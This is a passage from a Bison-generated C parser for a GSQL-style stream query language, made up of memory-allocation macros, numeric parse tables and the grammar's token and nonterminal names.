# define YYSTACK_ALLOC_MAXIMUM YYSIZE_MAXIMUM
# endif
# if (defined __cplusplus && ! defined EXIT_SUCCESS \
&& ! ((defined YYMALLOC || defined malloc) \
&& (defined YYFREE || defined free)))
# include <stdlib.h> /* INFRINGES ON USER NAME SPACE */
# ifndef EXIT_SUCCESS
# define EXIT_SUCCESS 0
# endif
# endif
# ifndef YYMALLOC
# define YYMALLOC malloc
# if ! defined malloc && ! defined EXIT_SUCCESS
void *malloc (YYSIZE_T); /* INFRINGES ON USER NAME SPACE */
# endif
# endif
# ifndef YYFREE
# define YYFREE free
# if ! defined free && ! defined EXIT_SUCCESS
void free (void *); /* INFRINGES ON USER NAME SPACE */
# endif
# endif
# endif
#endif /* ! defined yyoverflow || YYERROR_VERBOSE */
#if (! defined yyoverflow \
&& (! defined __cplusplus \
|| (defined YYSTYPE_IS_TRIVIAL && YYSTYPE_IS_TRIVIAL)))
/* A type that is properly aligned for any stack member. */
union yyalloc
{
yytype_int16 yyss_alloc;
YYSTYPE yyvs_alloc;
};
/* The size of the maximum gap between one aligned stack and the next. */
# define YYSTACK_GAP_MAXIMUM (sizeof (union yyalloc) - 1)
/* The size of an array large to enough to hold all stacks, each with
N elements. */
# define YYSTACK_BYTES(N) \
((N) * (sizeof (yytype_int16) + sizeof (YYSTYPE)) \
+ YYSTACK_GAP_MAXIMUM)
# define YYCOPY_NEEDED 1
/* Relocate STACK from its old location to the new one. The
local variables YYSIZE and YYSTACKSIZE give the old and new number of
elements in the stack, and YYPTR gives the new location of the
stack. Advance YYPTR to a properly aligned location for the next
stack. */
# define YYSTACK_RELOCATE(Stack_alloc, Stack) \
do \
{ \
YYSIZE_T yynewbytes; \
YYCOPY (&yyptr->Stack_alloc, Stack, yysize); \
Stack = &yyptr->Stack_alloc; \
yynewbytes = yystacksize * sizeof (*Stack) + YYSTACK_GAP_MAXIMUM; \
yyptr += yynewbytes / sizeof (*yyptr); \
} \
while (0)
#endif
#if defined YYCOPY_NEEDED && YYCOPY_NEEDED
/* Copy COUNT objects from SRC to DST. The source and destination do
not overlap. */
# ifndef YYCOPY
# if defined __GNUC__ && 1 < __GNUC__
# define YYCOPY(Dst, Src, Count) \
__builtin_memcpy (Dst, Src, (Count) * sizeof (*(Src)))
# else
# define YYCOPY(Dst, Src, Count) \
do \
{ \
YYSIZE_T yyi; \
for (yyi = 0; yyi < (Count); yyi++) \
(Dst)[yyi] = (Src)[yyi]; \
} \
while (0)
# endif
# endif
#endif /* !YYCOPY_NEEDED */
/* YYFINAL -- State number of the termination state. */
#define YYFINAL 60
/* YYLAST -- Last index in YYTABLE. */
#define YYLAST 738
/* YYNTOKENS -- Number of terminals. */
#define YYNTOKENS 82
/* YYNNTS -- Number of nonterminals. */
#define YYNNTS 60
/* YYNRULES -- Number of rules. */
#define YYNRULES 183
/* YYNSTATES -- Number of states. */
#define YYNSTATES 390
/* YYTRANSLATE[YYX] -- Symbol number corresponding to YYX as returned
by yylex, with out-of-bounds checking. */
#define YYUNDEFTOK 2
#define YYMAXUTOK 317
#define YYTRANSLATE(YYX) \
((unsigned int) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK)
/* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM
as returned by yylex, without out-of-bounds checking. */
static const yytype_uint8 yytranslate[] =
{
0, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 76, 2, 79, 78, 19, 13, 2,
70, 72, 17, 15, 71, 16, 73, 18, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 81, 2,
2, 2, 2, 2, 80, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 74, 2, 75, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 12, 2, 77, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 1, 2, 3, 4,
5, 6, 7, 8, 9, 10, 11, 14, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
42, 43, 44, 45, 46, 47, 48, 49, 50, 51,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
62, 63, 64, 65, 66, 67, 68, 69
};
#if YYDEBUG
/* YYRLINE[YYN] -- Source line where rule number YYN was defined. */
static const yytype_uint16 yyrline[] =
{
0, 206, 206, 211, 218, 232, 237, 242, 247, 251,
254, 259, 264, 268, 272, 275, 280, 285, 289, 293,
298, 299, 303, 304, 308, 309, 313, 314, 318, 319,
323, 327, 329, 334, 342, 346, 358, 359, 360, 361,
362, 363, 364, 368, 369, 373, 374, 378, 379, 380,
381, 382, 386, 387, 392, 393, 397, 401, 402, 406,
407, 411, 412, 416, 417, 421, 428, 429, 430, 431,
432, 436, 437, 438, 439, 443, 447, 451, 452, 458,
459, 460, 461, 462, 463, 464, 465, 466, 467, 468,
469, 470, 471, 472, 473, 474, 475, 476, 477, 478,
479, 480, 481, 482, 487, 488, 489, 490, 494, 495,
499, 500, 501, 502, 503, 504, 505, 506, 507, 508,
509, 510, 516, 517, 521, 522, 526, 527, 531, 532,
533, 534, 538, 539, 543, 544, 548, 549, 550, 551,
562, 563, 567, 568, 569, 573, 574, 578, 582, 583,
598, 599, 602, 604, 606, 608, 612, 613, 617, 621,
622, 626, 629, 630, 634, 635, 639, 640, 644, 645,
646, 647, 648, 649, 650, 651, 655, 656, 660, 661,
665, 666, 670, 671
};
#endif
#if YYDEBUG || YYERROR_VERBOSE || 0
/* YYTNAME[SYMBOL-NUM] -- String name of the symbol SYMBOL-NUM.
First, the terminals, then, starting at YYNTOKENS, nonterminals. */
static const char *const yytname[] =
{
"$end", "error", "$undefined", "NAME", "STRING_TOKEN", "INTNUM",
"LONGINTNUM", "APPROXNUM", "OR", "AND", "NOT", "COMPARISON", "'|'",
"'&'", "SHIFT_OP", "'+'", "'-'", "'*'", "'/'", "'%'", "UMINUS",
"SEMICOLON", "LEFTBRACE", "RIGHTBRACE", "BY", "AS", "AGGR", "FROM",
"INNER_JOIN", "FILTER_JOIN", "OUTER_JOIN", "LEFT_OUTER_JOIN",
"RIGHT_OUTER_JOIN", "WATCHLIST_JOIN", "GROUP", "HAVING", "IN", "SELECT",
"WATCHLIST", "WHERE", "SUPERGROUP", "CLEANING_WHEN", "CLEANING_BY",
"CLOSING_WHEN", "SUCH", "THAT", "CUBE", "ROLLUP", "GROUPING_SETS",
"TRUE_V", "FALSE_V", "TIMEVAL_L", "HEX_L", "LHEX_L", "IP_L", "IPV6_L",
"MERGE", "SLACK", "DEFINE_SEC", "PARAM_SEC", "PROTOCOL", "TABLE",
"STREAM", "FTA", "UNPACK_FCNS", "OPERATOR", "OPERATOR_VIEW", "FIELDS",
"SUBQUERIES", "SELECTION_PUSHDOWN", "'('", "','", "')'", "'.'", "'['",
"']'", "'!'", "'~'", "'$'", "'#'", "'@'", "':'", "$accept",
"parse_result", "gsql", "query_list", "params_def", "variable_def",
"variable_list", "variable_assign", "select_statement",
"merge_statement", "watchlist_statement", "selection", "table_exp",
"from_clause", "table_ref_commalist", "table_ref", "table", "qname",
"opt_where_clause", "where_clause", "opt_cleaning_when_clause",
"opt_cleaning_by_clause", "opt_closing_when_clause", "opt_having_clause",
"having_clause", "search_condition", "predicate", "comparison_predicate",
"in_predicate", "literal_commalist", "scalar_exp", "select_commalist",
"scalar_exp_commalist", "literal", "opt_group_by_clause",
"opt_supergroup_clause", "list_of_gb_commalist", "extended_gb",
"extended_gb_commalist", "gb_commalist", "gb", "ifparam", "column_ref",
"column_ref_list", "gb_ref", "gb_ref_list", "table_list", "table_def",
"unpack_func_list", "unpack_func", "subqueryspec_list", "subq_spec",
"field_list", "field", "opt_param_commalist", "param_commalist",
"opt_singleparam_commalist_bkt", "opt_singleparam_commalist",
"singleparam_commalist", "namevec_commalist", YY_NULLPTR
};
#endif
# ifdef YYPRINT
/* YYTOKNUM[NUM] -- (External) token number corresponding to the
(internal) symbol number NUM (which must be that of a token). */
static const yytype_uint16 yytoknum[] =
{
0, 256, 257, 258, 259, 260, 261, 262, 263, 264,
265, 266, 124, 38, 267, 43, 45, 42, 47, 37,
268, 269, 270, 271, 272, 273, 274, 275, 276, 277,
278, 279, 280, 281, 282, 283, 284, 285, 286, 287,
288, 289, 290, 291, 292, 293, 294, 295, 296, 297,
298, 299, 300, 301, 302, 303, 304, 305, 306, 307,
308, 309, 310, 311, 312, 313, 314, 315, 316, 317,
40, 44, 41, 46, 91, 93, 33, 126, 36, 35,
64, 58
};
# endif
#define YYPACT_NINF -290
#define yypact_value_is_default(Yystate) \
(!!((Yystate) == (-290)))
#define YYTABLE_NINF -145
#define yytable_value_is_error(Yytable_value) \
0
/* YYPACT[STATE-NUM] -- Index in YYTABLE of the portion describing
STATE-NUM. */
static const yytype_int16 yypact[] =
{
87, 519, -34, 49, 60, 70, 66, 108, 104, 112,
137, 161, -290, 157, 16, 98, -290, -290, -290, 277,
-290, 45, -290, -290, -290, -290, 519, 519, -12, -290,
-290, 184, 198, 220, 256, 295, 519, 519, 519, 196,
226, 308, 500, 315, 265, -290, -290, -290, 320, 280,
285, 141, 20, 28, 306, -290, 6, 277, 374, 358,
-290, -10, 92, -290, -290, -290, 92, -290, -290, -290,
-290, 228, 13, 311, -290, -290, 309, 312, -290, -290,
-290, -290, -290, 356, -290, -290, -290, -290, -290, 17,
351, 313, 357, 370, 371, 372, -290, 361, 519, 519,
519, 519, 519, 519, 519, 519, 398, 519, 404, 405,
49, 519, 49, -290, 152, -290, 44, -290, -290, 119,
406, 336, 409, 419, 401, 121, 421, 116, -290, 362,
-290, -290, -290, -290, -290, -290, -290, -290, 719, 170,
353, 426, 341, 359, 446, 399, -290, 360, 366, 427,
369, -290, 429, 424, 17, 49, 17, 17, 17, 17,
431, 410, -290, 618, 481, 176, 209, 209, -290, -290,
-290, -290, 674, 440, 181, -290, -290, 652, -290, 434,
435, -290, -290, -290, 252, 192, 419, 423, -290, -290,
213, 404, 443, 462, 374, -290, 306, 519, -290, 465,
-290, -290, 215, -290, -290, 400, 644, 467, 468, 412,
17, -290, 369, 402, 369, 369, 369, 369, 188, 431,
431, 260, -290, -290, -290, 234, 450, 448, 486, 26,
-290, -290, -290, -290, -290, -290, -290, -290, 501, -290,
-41, 404, 502, -290, 197, -290, -290, -290, 439, 719,
-290, -290, -290, -290, 441, 424, 442, 444, -290, 507,
487, -290, 36, 602, 431, 431, 519, 445, 160, 513,
485, -290, 306, 522, 268, -290, 200, -290, -290, 499,
108, 108, 108, 472, -290, -16, -290, 545, -290, 719,
35, 534, 488, 490, 491, 688, -290, 484, -290, -290,
504, 505, 431, 515, -290, 336, -290, -290, -290, -290,
-290, 404, 424, 424, 424, 550, -290, 146, -290, 15,
575, 575, 514, 580, 160, 513, 513, 260, 431, 543,
565, 202, 17, 35, -290, 276, 225, -290, 231, 575,
238, -290, -290, -290, -290, 260, 431, 544, -290, 520,
369, -290, 589, 575, -290, -290, 246, 523, -290, 260,
431, -290, 572, 705, -290, -290, 575, 260, 597, 250,
532, 195, -290, -290, 600, 597, 536, 603, 279, -290,
306, 306, 605, -290, 586, -290, 607, -290, 306, -290
};
/* YYDEFACT[STATE-NUM] -- Default reduction number in state STATE-NUM.
Performed when YYTABLE does not specify something else to do. Zero
means the default is an error. */
static const yytype_uint8 yydefact[] =
{
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 20, 2, 0, 0, 9, 14, 19, 3,
150, 142, 110, 111, 112, 113, 0, 0, 0, 114,
115, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 104, 34, 91, 93, 94, 0, 142,
0, 0, 0, 0, 166, 52, 178, 0, 0, 0,
1, 0, 0, 7, 12, 17, 0, 8, 13, 18,
151, 0, 0, 0, 87, 88, 0, 0, 116, 117,
118, 119, 120, 0, 89, 90, 92, 121, 140, 0,
0, 0, 0, 0, 0, 0, 30, 54, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 31, 0, 25, 0, 26, 23, 0,
0, 176, 0, 0, 0, 0, 0, 0, 156, 0,
21, 6, 11, 16, 5, 10, 15, 99, 108, 0,
143, 0, 0, 0, 0, 0, 95, 52, 0, 0,
36, 43, 45, 47, 0, 0, 0, 0, 0, 0,
0, 122, 55, 81, 84, 86, 79, 80, 82, 83,
85, 105, 106, 0, 0, 162, 145, 0, 146, 0,
0, 24, 27, 22, 168, 0, 0, 0, 53, 180,
0, 0, 0, 0, 0, 155, 166, 0, 98, 0,
141, 103, 0, 96, 97, 0, 0, 0, 0, 0,
0, 46, 37, 0, 38, 40, 39, 41, 142, 0,
0, 56, 70, 71, 72, 0, 0, 124, 0, 166,
33, 163, 32, 29, 28, 169, 170, 171, 0, 167,
0, 0, 0, 179, 0, 4, 158, 157, 0, 109,
144, 102, 100, 101, 52, 48, 0, 0, 44, 0,
0, 68, 0, 0, 0, 0, 0, 0, 0, 0,
63, 107, 166, 0, 172, 177, 0, 181, 153, 0,
0, 0, 0, 0, 73, 0, 69, 66, 67, 75,
0, 136, 0, 0, 0, 0, 132, 123, 128, 147,
0, 125, 0, 57, 64, 176, 165, 173, 174, 175,
152, 0, 49, 50, 51, 0, 74, 0, 77, 0,
0, 0, 0, 0, 0, 0, 0, 65, 0, 59,
0, 0, 0, 0, 76, 137, 0, 134, 0, 0,
0, 139, 133, 148, 149, 58, 0, 61, 164, 0,
42, 78, 0, 0, 130, 129, 0, 0, 131, 60,
0, 35, 0, 138, 135, 126, 0, 62, 0, 0,
0, 0, 159, 127, 0, 0, 0, 0, 0, 160,
166, 166, 0, 161, 0, 182, 0, 154, 166, 183
};
/* YYPGOTO[NTERM-NUM]. */
static const yytype_int16 yypgoto[] =
{
-290, -290, -42, -290, 596, 608, 570, -48, 47, 50,
65, -290, -290, -49, -150, 430, -290, -6, -290, -290,
-290, -290, -290, -290, -290, -208, -290, -290, -290, -290,
-1, -290, -128, -273, -290, -290, -290, 317, -290, -289,
-246, -290, 7, -290, 29, -290, 582, -4, -290, 449,
-290, 267, -178, -171, -191, -290, 339, -290, 460, -290
};
/* YYDEFGOTO[NTERM-NUM]. */
static const yytype_int16 yydefgoto[] =
{
-1, 11, 12, 13, 14, 15, 116, 117, 16, 17,
18, 42, 96, 97, 150, 151, 152, 153, 161, 162,
329, 347, 361, 303, 304, 221, 222, 223, 224, 317,
225, 44, 139, 45, 227, 270, 340, 296, 297, 336,
337, 46, 47, 51, 300, 301, 19, 20, 127, 128,
371, 372, 174, 175, 121, 185, 187, 124, 190, 378
};
/* YYTABLE[YYPACT[STATE-NUM]] -- What to do in state STATE-NUM. If
positive, shift that token. If negative, reduce the rule whose
number is the opposite. If YYTABLE_NINF, syntax error. */
static const yytype_int16 yytable[] =
{
43, 56, 113, 231, 212, 248, 214, 215, 216, 217,
50, 261, 262, 244, 202, 70, 140, 318, 335, 130,
147, 148, 298, 114, 122, 74, 75, 1, 2, 272,
242, 114, 338, 48, 275, 83, 84, 85, 273, 22,
23, 24, 25, 115, 264, 265, 3, 114, 4, 5,
356, 118, 49, 1, 2, 197, 287, 288, 76, 316,
351, 63, 67, 276, 64, 68, 77, 181, 182, 54,
138, 182, 3, 231, 4, 144, 123, 369, 298, 65,
69, 305, 52, 192, 29, 30, 31, 32, 33, 34,
35, 149, 53, 141, 327, 141, 120, 163, 164, 165,
166, 167, 168, 169, 170, 231, 172, 364, 286, 131,
177, 55, 132, 134, 40, 71, 135, 176, 72, 178,
345, 70, 114, 73, 1, 2, 57, 133, 232, 1,
2, 136, 285, 331, 58, 1, 2, 194, 359, 195,
59, 138, 183, 3, 206, 4, 5, 6, 3, 7,
8, 9, 367, 10, 3, 179, 180, 5, 1, 2,
231, 60, 213, 291, 22, 23, 24, 25, 89, 90,
91, 92, 93, 94, 95, 26, 27, 3, 61, 4,
5, 6, 350, 7, 173, 9, 28, 10, 78, 384,
385, 101, 102, 103, 104, 105, 249, 389, 111, 86,
173, 255, 79, 173, 230, 173, 292, 293, 294, 29,
30, 31, 32, 33, 34, 35, 375, 333, 376, 263,
278, 334, 112, 310, 80, 349, 103, 104, 105, 87,
36, 21, 22, 23, 24, 25, 37, 38, 39, 40,
41, 197, 198, 26, 27, 266, 98, 99, 100, 101,
102, 103, 104, 105, 28, 235, 236, 237, 71, 138,
81, 72, 260, 238, 239, 289, 73, 295, 264, 265,
267, 307, 308, 309, 312, 313, 314, 29, 30, 31,
32, 33, 34, 35, 242, 243, 197, 251, -143, -143,
-143, -143, -143, -143, -143, -143, 353, 354, 36, 82,
137, -143, 353, 355, 37, 38, 39, 40, 41, 357,
358, 88, 21, 22, 23, 24, 25, 353, 365, 295,
295, 353, 373, 295, 26, 27, 143, 98, 99, 100,
101, 102, 103, 104, 105, 28, 107, 6, 295, 7,
106, 9, 108, 10, 21, 22, 23, 24, 25, 352,
382, 383, 295, 109, 343, 344, 26, 27, 29, 30,
31, 32, 33, 34, 35, 295, 110, 28, 98, 99,
100, 101, 102, 103, 104, 105, 120, 126, 154, 36,
129, 142, 145, 155, 156, 37, 38, 39, 40, 41,
29, 30, 31, 32, 33, 34, 35, 157, 158, 159,
160, 171, 21, 22, 23, 24, 25, 173, 140, 184,
186, 36, 188, 201, 26, 27, 205, 37, 38, 39,
40, 41, 189, 191, 193, 28, 199, 196, 146, 200,
209, 203, 211, 207, 218, 22, 23, 24, 25, 208,
210, 219, 122, 229, 226, 241, 26, 27, 29, 30,
31, 32, 33, 34, 35, 233, 234, 28, 98, 99,
100, 101, 102, 103, 104, 105, 245, 246, 250, 36,
254, 256, 252, 259, 268, 37, 38, 39, 40, 41,
29, 30, 31, 32, 33, 34, 35, 257, 269, 271,
21, 22, 23, 24, 25, 100, 101, 102, 103, 104,
105, 220, 26, 27, 274, 277, 279, 37, 38, 39,
40, 41, 283, 28, 280, 281, 299, 282, 204, 290,
302, 311, 21, 22, 23, 24, 25, 89, 90, 91,
92, 93, 94, 95, 26, 27, 29, 30, 31, 32,
33, 34, 35, 306, 315, 28, -142, -142, -142, -142,
-142, -142, -142, -142, 265, 324, 328, 36, 320, -142,
321, 322, 284, 37, 38, 39, 40, 41, 29, 30,
31, 32, 33, 34, 35, 325, 326, 332, 291, 22,
23, 24, 25, 341, 339, 346, 348, 360, 362, 36,
26, 27, 363, 366, 368, 37, 38, 39, 40, 41,
370, 28, 374, 377, 71, 380, 381, 319, 386, 387,
388, 66, 73, 266, 98, 99, 100, 101, 102, 103,
104, 105, 62, 119, 29, 30, 31, 32, 33, 34,
35, 99, 100, 101, 102, 103, 104, 105, 267, 125,
258, 342, 379, 247, 330, 36, 240, 0, 0, 0,
0, 37, 38, 39, 40, 41, 98, 99, 100, 101,
102, 103, 104, 105, 98, 99, 100, 101, 102, 103,
104, 105, 0, 0, 146, 0, 0, 0, 0, 89,
90, 91, 92, 93, 94, 95, 98, 99, 100, 101,
102, 103, 104, 105, 0, 0, 0, 0, 0, 228,
98, 99, 100, 101, 102, 103, 104, 105, 0, 0,
0, 0, 0, 323, 0, 0, 253, -144, -144, -144,
-144, -144, -144, -144, -144, 0, 0, 0, 0, 0,
-144, 98, 99, 100, 101, 102, 103, 104, 105
};
static const yytype_int16 yycheck[] =
{
1, 7, 51, 174, 154, 196, 156, 157, 158, 159,
3, 219, 220, 191, 142, 19, 3, 290, 3, 61,
3, 4, 268, 3, 18, 26, 27, 37, 38, 3,
71, 3, 321, 67, 75, 36, 37, 38, 229, 4,
5, 6, 7, 23, 8, 9, 56, 3, 58, 59,
339, 23, 3, 37, 38, 71, 264, 265, 70, 75,
333, 14, 15, 241, 14, 15, 78, 23, 116, 3,
71, 119, 56, 244, 58, 76, 70, 366, 324, 14,
15, 272, 22, 125, 49, 50, 51, 52, 53, 54,
55, 74, 22, 80, 302, 80, 70, 98, 99, 100,
101, 102, 103, 104, 105, 276, 107, 353, 72, 62,
111, 3, 62, 66, 79, 70, 66, 110, 73, 112,
328, 125, 3, 78, 37, 38, 22, 62, 177, 37,
38, 66, 260, 311, 22, 37, 38, 21, 346, 23,
3, 142, 23, 56, 145, 58, 59, 60, 56, 62,
63, 64, 360, 66, 56, 3, 4, 59, 37, 38,
331, 0, 155, 3, 4, 5, 6, 7, 27, 28,
29, 30, 31, 32, 33, 15, 16, 56, 21, 58,
59, 60, 332, 62, 3, 64, 26, 66, 4, 380,
381, 15, 16, 17, 18, 19, 197, 388, 57, 3,
3, 207, 4, 3, 23, 3, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 21, 71, 23, 220,
23, 75, 81, 23, 4, 23, 17, 18, 19, 3,
70, 3, 4, 5, 6, 7, 76, 77, 78, 79,
80, 71, 72, 15, 16, 11, 12, 13, 14, 15,
16, 17, 18, 19, 26, 3, 4, 5, 70, 260,
4, 73, 74, 71, 72, 266, 78, 268, 8, 9,
36, 3, 4, 5, 280, 281, 282, 49, 50, 51,
52, 53, 54, 55, 71, 72, 71, 72, 12, 13,
14, 15, 16, 17, 18, 19, 71, 72, 70, 4,
72, 25, 71, 72, 76, 77, 78, 79, 80, 71,
72, 3, 3, 4, 5, 6, 7, 71, 72, 320,
321, 71, 72, 324, 15, 16, 17, 12, 13, 14,
15, 16, 17, 18, 19, 26, 71, 60, 339, 62,
25, 64, 22, 66, 3, 4, 5, 6, 7, 73,
71, 72, 353, 73, 325, 326, 15, 16, 49, 50,
51, 52, 53, 54, 55, 366, 81, 26, 12, 13,
14, 15, 16, 17, 18, 19, 70, 3, 27, 70,
22, 70, 70, 70, 27, 76, 77, 78, 79, 80,
49, 50, 51, 52, 53, 54, 55, 27, 27, 27,
39, 3, 3, 4, 5, 6, 7, 3, 3, 3,
74, 70, 3, 72, 15, 16, 17, 76, 77, 78,
79, 80, 3, 22, 3, 26, 73, 65, 72, 3,
3, 72, 3, 73, 3, 4, 5, 6, 7, 73,
71, 10, 18, 3, 34, 22, 15, 16, 49, 50,
51, 52, 53, 54, 55, 21, 21, 26, 12, 13,
14, 15, 16, 17, 18, 19, 23, 5, 3, 70,
3, 3, 72, 71, 24, 76, 77, 78, 79, 80,
49, 50, 51, 52, 53, 54, 55, 75, 40, 3,
3, 4, 5, 6, 7, 14, 15, 16, 17, 18,
19, 70, 15, 16, 3, 3, 67, 76, 77, 78,
79, 80, 5, 26, 73, 73, 3, 73, 72, 74,
35, 22, 3, 4, 5, 6, 7, 27, 28, 29,
30, 31, 32, 33, 15, 16, 49, 50, 51, 52,
53, 54, 55, 21, 72, 26, 12, 13, 14, 15,
16, 17, 18, 19, 9, 71, 41, 70, 70, 25,
70, 70, 75, 76, 77, 78, 79, 80, 49, 50,
51, 52, 53, 54, 55, 71, 71, 27, 3, 4,
5, 6, 7, 3, 70, 42, 21, 43, 68, 70,
15, 16, 3, 70, 22, 76, 77, 78, 79, 80,
3, 26, 70, 3, 70, 69, 3, 73, 3, 23,
3, 15, 78, 11, 12, 13, 14, 15, 16, 17,
18, 19, 14, 53, 49, 50, 51, 52, 53, 54,
55, 13, 14, 15, 16, 17, 18, 19, 36, 57,
210, 324, 375, 194, 305, 70, 186, -1, -1, -1,
-1, 76, 77, 78, 79, 80, 12, 13, 14, 15,
16, 17, 18, 19, 12, 13, 14, 15, 16, 17,
18, 19, -1, -1, 72, -1, -1, -1, -1, 27,
28, 29, 30, 31, 32, 33, 12, 13, 14, 15,
16, 17, 18, 19, -1, -1, -1, -1, -1, 25,
12, 13, 14, 15, 16, 17, 18, 19, -1, -1,
-1, -1, -1, 25, -1, -1, 72, 12, 13, 14,
15, 16, 17, 18, 19, -1, -1, -1, -1, -1,
25, 12, 13, 14, 15, 16, 17, 18, 19
};
/* YYSTOS[STATE-NUM] -- The (internal number of the) accessing
symbol of state STATE-NUM. */
static const yytype_uint8 yystos[] =
{
0, 37, 38, 56, 58, 59, 60, 62, 63, 64,
66, 83, 84, 85, 86, 87, 90, 91, 92, 128,
129, 3, 4, 5, 6, 7, 15, 16, 26, 49,
50, 51, 52, 53, 54, 55, 70, 76, 77, 78,
79, 80, 93, 112, 113, 115, 123, 124, 67, 3,
124, 125, 22, 22, 3, 3, 99, 22, 22, 3,
0, 21, 87, 90, 91, 92, 86, 90, 91, 92,
129, 70, 73, 78, 112, 112, 70, 78, 4, 4,
4, 4, 4, 112, 112, 112, 3, 3, 3, 27,
28, 29, 30, 31, 32, 33, 94, 95, 12, 13,
14, 15, 16, 17, 18, 19, 25, 71, 22, 73,
81, 57, 81, 95, 3, 23, 88, 89, 23, 88,
70, 136, 18, 70, 139, 128, 3, 130, 131, 22,
84, 90, 91, 92, 90, 91, 92, 72, 112, 114,
3, 80, 70, 17, 112, 70, 72, 3, 4, 74,
96, 97, 98, 99, 27, 70, 27, 27, 27, 27,
39, 100, 101, 112, 112, 112, 112, 112, 112, 112,
112, 3, 112, 3, 134, 135, 124, 112, 124, 3,
4, 23, 89, 23, 3, 137, 74, 138, 3, 3,
140, 22, 84, 3, 21, 23, 65, 71, 72, 73,
3, 72, 114, 72, 72, 17, 112, 73, 73, 3,
71, 3, 96, 124, 96, 96, 96, 96, 3, 10,
70, 107, 108, 109, 110, 112, 34, 116, 25, 3,
23, 135, 95, 21, 21, 3, 4, 5, 71, 72,
140, 22, 71, 72, 134, 23, 5, 131, 136, 112,
3, 72, 72, 72, 3, 99, 3, 75, 97, 71,
74, 107, 107, 112, 8, 9, 11, 36, 24, 40,
117, 3, 3, 136, 3, 75, 134, 3, 23, 67,
73, 73, 73, 5, 75, 114, 72, 107, 107, 112,
74, 3, 46, 47, 48, 112, 119, 120, 122, 3,
126, 127, 35, 105, 106, 136, 21, 3, 4, 5,
23, 22, 99, 99, 99, 72, 75, 111, 115, 73,
70, 70, 70, 25, 71, 71, 71, 107, 41, 102,
138, 134, 27, 71, 75, 3, 121, 122, 121, 70,
118, 3, 119, 126, 126, 107, 42, 103, 21, 23,
96, 115, 73, 71, 72, 72, 121, 71, 72, 107,
43, 104, 68, 3, 122, 72, 70, 107, 22, 121,
3, 132, 133, 72, 70, 21, 23, 3, 141, 133,
69, 3, 71, 72, 136, 136, 3, 23, 3, 136
};
/* YYR1[YYN] -- Symbol number of symbol that rule YYN derives. */
static const yytype_uint8 yyr1[] =
{
0, 82, 83, 83, 83, 84, 84, 84, 84, 84,
84, 84, 84, 84, 84, 84, 84, 84, 84, 84,
85, 85, 86, 86, 87, 87, 88, 88, 89, 89,
90, 91, 91, 92, 93, 94, 95, 95, 95, 95,
95, 95, 95, 96, 96, 97, 97, 98, 98, 98,
98, 98, 99, 99, 100, 100, 101, 102, 102, 103,
103, 104, 104, 105, 105, 106, 107, 107, 107, 107,
107, 108, 108, 108, 108, 109, 110, 111, 111, 112,
112, 112, 112, 112, 112, 112, 112, 112, 112, 112,
112, 112, 112, 112, 112, 112, 112, 112, 112, 112,
112, 112, 112, 112, 113, 113, 113, 113, 114, 114,
115, 115, 115, 115, 115, 115, 115, 115, 115, 115,
115, 115, 116, 116, 117, 117, 118, 118, 119, 119,
119, 119, 120, 120, 121, 121, 122, 122, 122, 122,
123, 123, 124, 124, 124, 125, 125, 126, 127, 127,
128, 128, 129, 129, 129, 129, 130, 130, 131, 132,
132, 133, 134, 134, 135, 135, 136, 136, 137, 137,
137, 137, 137, 137, 137, 137, 138, 138, 139, 139,
140, 140, 141, 141
};
/* YYR2[YYN] -- Number of symbols on the right hand side of rule YYN. */
static const yytype_uint8 yyr2[] =
{
0, 2, 1, 1, 5, 3, 3, 2, 2, 1,
3, 3, 2, 2, 1, 3, 3, 2, 2, 1,
1, 3, 4, 3, 4, 3, 1, 2, 3, 3,
3, 3, 5, 5, 1, 8, 2, 3, 3, 3,
3, 3, 8, 1, 3, 1, 2, 1, 3, 5,
5, 5, 1, 3, 0, 1, 2, 0, 2, 0,
2, 0, 2, 0, 1, 2, 3, 3, 2, 3,
1, 1, 1, 3, 4, 3, 5, 1, 3, 3,
3, 3, 3, 3, 3, 3, 3, 2, 2, 2,
2, 1, 2, 1, 1, 3, 4, 4, 4, 3,
5, 5, 5, 4, 1, 3, 3, 5, 1, 3,
1, 1, 1, 1, 1, 1, 2, 2, 2, 2,
2, 2, 0, 3, 0, 2, 3, 5, 1, 4,
4, 4, 1, 3, 1, 3, 1, 3, 5, 3,
2, 4, 1, 3, 5, 3, 3, 1, 3, 3,
1, 2, 7, 6, 16, 4, 1, 3, 3, 1,
3, 4, 1, 2, 6, 4, 0, 3, 1, 2,
2, 2, 3, 4, 4, 4, 0, 3, 0, 3,
1, 3, 3, 5
};
#define yyerrok (yyerrstatus = 0)
#define yyclearin (yychar = YYEMPTY)
#define YYEMPTY (-2)
#define YYEOF 0
#define YYACCEPT goto yyacceptlab
#define YYABORT goto yyabortlab
